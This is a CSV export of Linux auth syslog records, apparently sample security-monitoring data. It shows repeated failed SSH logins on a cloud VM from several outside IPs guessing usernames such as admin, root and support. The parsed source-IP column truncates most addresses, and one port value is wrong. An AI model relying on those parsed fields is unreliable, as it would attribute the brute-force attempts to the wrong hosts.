+18405,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:11:11,UbuntuDevEnv,2019-06-26 10:11:11,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,80816,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18406,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:11:14,UbuntuDevEnv,2019-06-26 10:11:13,auth,UbuntuDevEnv,info,Failed password for invalid user vps from 128.199.242.84 port 39032 ssh2,80816,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vps,128.199.242.8,39032,,
+18407,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:11:14,UbuntuDevEnv,2019-06-26 10:11:13,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.242.84 port 39032:11: Normal Shutdown, Thank you for playing [preauth]",80816,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.242.8,39032,,
+18408,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:11:14,UbuntuDevEnv,2019-06-26 10:11:13,auth,UbuntuDevEnv,info,Disconnected from invalid user vps 128.199.242.84 port 39032 [preauth],80816,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vps,128.199.242.8,39032,,
+18409,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:12:19,UbuntuDevEnv,2019-06-26 10:12:18,auth,UbuntuDevEnv,info,Invalid user support from 37.59.6.106 port 45424,81089,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,support,37.59.6.1,45424,,
+18410,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:12:19,UbuntuDevEnv,2019-06-26 10:12:18,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,81089,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18411,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:12:19,UbuntuDevEnv,2019-06-26 10:12:18,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=37.59.6.106,81089,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,37.59.6.1,,0,
+18412,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:12:21,UbuntuDevEnv,2019-06-26 10:12:20,auth,UbuntuDevEnv,info,Failed password for invalid user support from 37.59.6.106 port 45424 ssh2,81089,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,support,37.59.6.1,45424,,
+18413,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:12:21,UbuntuDevEnv,2019-06-26 10:12:20,auth,UbuntuDevEnv,info,Disconnected from invalid user support 37.59.6.106 port 45424 [preauth],81089,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,support,37.59.6.1,37,,
+18414,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:12:21,UbuntuDevEnv,2019-06-26 10:12:20,auth,UbuntuDevEnv,info,Received disconnect from 37.59.6.106 port 45424:11: Bye Bye [preauth],81089,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,37.59.6.1,45424,,
+18415,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:13:47,UbuntuDevEnv,2019-06-26 10:13:46,auth,UbuntuDevEnv,info,Invalid user qq from 37.59.6.106 port 34088,81402,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,qq,37.59.6.1,34088,,
+18416,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:13:47,UbuntuDevEnv,2019-06-26 10:13:46,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,81402,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18417,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:13:47,UbuntuDevEnv,2019-06-26 10:13:46,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=37.59.6.106,81402,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,37.59.6.1,,0,
+18418,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:13:49,UbuntuDevEnv,2019-06-26 10:13:48,auth,UbuntuDevEnv,info,Failed password for invalid user qq from 37.59.6.106 port 34088 ssh2,81402,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,qq,37.59.6.1,34088,,
+18419,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:13:49,UbuntuDevEnv,2019-06-26 10:13:48,auth,UbuntuDevEnv,info,Disconnected from invalid user qq 37.59.6.106 port 34088 [preauth],81402,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,qq,37.59.6.1,34088,,
+18420,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:13:49,UbuntuDevEnv,2019-06-26 10:13:48,auth,UbuntuDevEnv,info,Received disconnect from 37.59.6.106 port 34088:11: Bye Bye [preauth],81402,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,37.59.6.1,34088,,
+18421,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:15:13,UbuntuDevEnv,2019-06-26 10:15:13,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=37.59.6.106  user=test,81727,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test,37.59.6.1,,0,
+18422,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:15:15,UbuntuDevEnv,2019-06-26 10:15:15,auth,UbuntuDevEnv,info,Failed password for test from 37.59.6.106 port 51022 ssh2,81727,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,37.59.6.1,51022,,
+18423,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:15:15,UbuntuDevEnv,2019-06-26 10:15:15,auth,UbuntuDevEnv,info,Received disconnect from 37.59.6.106 port 51022:11: Bye Bye [preauth],81727,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,37.59.6.1,51022,,
+18424,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:15:15,UbuntuDevEnv,2019-06-26 10:15:15,auth,UbuntuDevEnv,info,Disconnected from authenticating user test 37.59.6.106 port 51022 [preauth],81727,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,test,37.59.6.1,51022,,
+18425,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:16:24,UbuntuDevEnv,2019-06-26 10:16:23,auth,UbuntuDevEnv,info,Invalid user semik from 47.44.115.81 port 40324,82040,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,semik,47.44.115.8,40324,,
+18426,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:16:24,UbuntuDevEnv,2019-06-26 10:16:23,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,82040,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18427,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:16:24,UbuntuDevEnv,2019-06-26 10:16:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=47.44.115.81,82040,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,47.44.115.8,,0,
+18428,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:16:26,UbuntuDevEnv,2019-06-26 10:16:25,auth,UbuntuDevEnv,info,Failed password for invalid user semik from 47.44.115.81 port 40324 ssh2,82040,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,semik,47.44.115.8,40324,,
+18429,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:16:26,UbuntuDevEnv,2019-06-26 10:16:25,auth,UbuntuDevEnv,info,Disconnected from invalid user semik 47.44.115.81 port 40324 [preauth],82040,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,semik,47.44.115.8,40324,,
+18430,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:16:26,UbuntuDevEnv,2019-06-26 10:16:25,auth,UbuntuDevEnv,info,Received disconnect from 47.44.115.81 port 40324:11: Bye Bye [preauth],82040,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.44.115.8,40324,,
+18431,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:16:38,UbuntuDevEnv,2019-06-26 10:16:37,auth,UbuntuDevEnv,info,Invalid user content from 37.59.6.106 port 39686,82091,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,content,37.59.6.1,39686,,
+18432,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:16:38,UbuntuDevEnv,2019-06-26 10:16:37,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,82091,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18433,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:16:38,UbuntuDevEnv,2019-06-26 10:16:37,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=37.59.6.106,82091,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,37.59.6.1,,0,
+18434,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:16:39,UbuntuDevEnv,2019-06-26 10:16:39,auth,UbuntuDevEnv,info,Failed password for invalid user content from 37.59.6.106 port 39686 ssh2,82091,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,content,37.59.6.1,39686,,
+18435,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:16:39,UbuntuDevEnv,2019-06-26 10:16:39,auth,UbuntuDevEnv,info,Disconnected from invalid user content 37.59.6.106 port 39686 [preauth],82091,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,content,37.59.6.1,39686,,
+18436,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:16:39,UbuntuDevEnv,2019-06-26 10:16:39,auth,UbuntuDevEnv,info,Received disconnect from 37.59.6.106 port 39686:11: Bye Bye [preauth],82091,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,37.59.6.1,39686,,
+18437,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:16:58,UbuntuDevEnv,2019-06-26 10:16:58,auth,UbuntuDevEnv,info,Invalid user ts from 106.13.142.247 port 50750,82157,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts,106.13.142.2,50750,,
+18438,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:16:58,UbuntuDevEnv,2019-06-26 10:16:58,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.142.247,82157,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.13.142.2,,0,
+18439,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:16:58,UbuntuDevEnv,2019-06-26 10:16:58,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,82157,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18440,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:17:00,UbuntuDevEnv,2019-06-26 10:17:00,auth,UbuntuDevEnv,info,Failed password for invalid user ts from 106.13.142.247 port 50750 ssh2,82157,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts,106.13.142.2,50750,,
+18441,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:17:01,UbuntuDevEnv,2019-06-26 10:17:00,auth,UbuntuDevEnv,info,Received disconnect from 106.13.142.247 port 50750:11: Bye Bye [preauth],82157,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.142.2,50750,,
+18442,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:17:01,UbuntuDevEnv,2019-06-26 10:17:00,auth,UbuntuDevEnv,info,Disconnected from invalid user ts 106.13.142.247 port 50750 [preauth],82157,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts,106.13.142.2,50750,,
+18443,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:17:32,UbuntuDevEnv,2019-06-26 10:17:32,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=62.117.12.62  user=root,82269,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,62.117.12.6,,0,
+18444,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:17:34,UbuntuDevEnv,2019-06-26 10:17:33,auth,UbuntuDevEnv,info,Failed password for root from 62.117.12.62 port 59940 ssh2,82269,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,62.117.12.6,59940,,
+18445,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:17:35,UbuntuDevEnv,2019-06-26 10:17:35,auth,UbuntuDevEnv,info,Connection closed by authenticating user root 62.117.12.62 port 59940 [preauth],82269,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,62.117.12.6,59940,,authenticating
+18446,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:18:04,UbuntuDevEnv,2019-06-26 10:18:03,auth,UbuntuDevEnv,info,Invalid user cirros from 37.59.6.106 port 56590,82399,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cirros,37.59.6.1,56590,,
+18447,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:18:04,UbuntuDevEnv,2019-06-26 10:18:03,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,82399,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18448,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:18:04,UbuntuDevEnv,2019-06-26 10:18:03,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=37.59.6.106,82399,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,37.59.6.1,,0,
+18449,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:18:05,UbuntuDevEnv,2019-06-26 10:18:05,auth,UbuntuDevEnv,info,Failed password for invalid user cirros from 37.59.6.106 port 56590 ssh2,82399,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cirros,37.59.6.1,56590,,
+18450,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:18:05,UbuntuDevEnv,2019-06-26 10:18:05,auth,UbuntuDevEnv,info,Disconnected from invalid user cirros 37.59.6.106 port 56590 [preauth],82399,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cirros,37.59.6.1,56590,,
+18451,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:18:05,UbuntuDevEnv,2019-06-26 10:18:05,auth,UbuntuDevEnv,info,Received disconnect from 37.59.6.106 port 56590:11: Bye Bye [preauth],82399,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,37.59.6.1,56590,,
+18452,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:19:26,UbuntuDevEnv,2019-06-26 10:19:25,auth,UbuntuDevEnv,info,Invalid user yin from 47.44.115.81 port 42108,82679,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,yin,47.44.115.8,42108,,
+18453,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:19:26,UbuntuDevEnv,2019-06-26 10:19:25,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=47.44.115.81,82679,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,47.44.115.8,,0,
+18454,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:19:26,UbuntuDevEnv,2019-06-26 10:19:25,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,82679,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18455,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:19:28,UbuntuDevEnv,2019-06-26 10:19:28,auth,UbuntuDevEnv,info,Failed password for invalid user yin from 47.44.115.81 port 42108 ssh2,82679,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,yin,47.44.115.8,42108,,
+18456,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:19:29,UbuntuDevEnv,2019-06-26 10:19:28,auth,UbuntuDevEnv,info,Disconnected from invalid user yin 47.44.115.81 port 42108 [preauth],82679,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,yin,47.44.115.8,42108,,
+18457,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:19:29,UbuntuDevEnv,2019-06-26 10:19:28,auth,UbuntuDevEnv,info,Received disconnect from 47.44.115.81 port 42108:11: Bye Bye [preauth],82679,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.44.115.8,42108,,
+18458,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:19:36,UbuntuDevEnv,2019-06-26 10:19:36,auth,UbuntuDevEnv,info,Invalid user admin from 37.59.6.106 port 45270,82721,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,37.59.6.1,45270,,
+18459,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:19:36,UbuntuDevEnv,2019-06-26 10:19:36,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,82721,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18460,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:19:36,UbuntuDevEnv,2019-06-26 10:19:36,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=37.59.6.106,82721,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,37.59.6.1,,0,
+18461,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:19:38,UbuntuDevEnv,2019-06-26 10:19:38,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 37.59.6.106 port 45270 ssh2,82721,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,37.59.6.1,45270,,
+18462,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:19:38,UbuntuDevEnv,2019-06-26 10:19:38,auth,UbuntuDevEnv,info,Received disconnect from 37.59.6.106 port 45270:11: Bye Bye [preauth],82721,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,37.59.6.1,45270,,
+18463,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:19:38,UbuntuDevEnv,2019-06-26 10:19:38,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 37.59.6.106 port 45270 [preauth],82721,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,37.59.6.1,45270,,
+18464,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:20:00,UbuntuDevEnv,2019-06-26 10:19:59,auth,UbuntuDevEnv,info,Invalid user ez from 200.209.174.76 port 47434,83109,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ez,200.209.174.7,47434,,
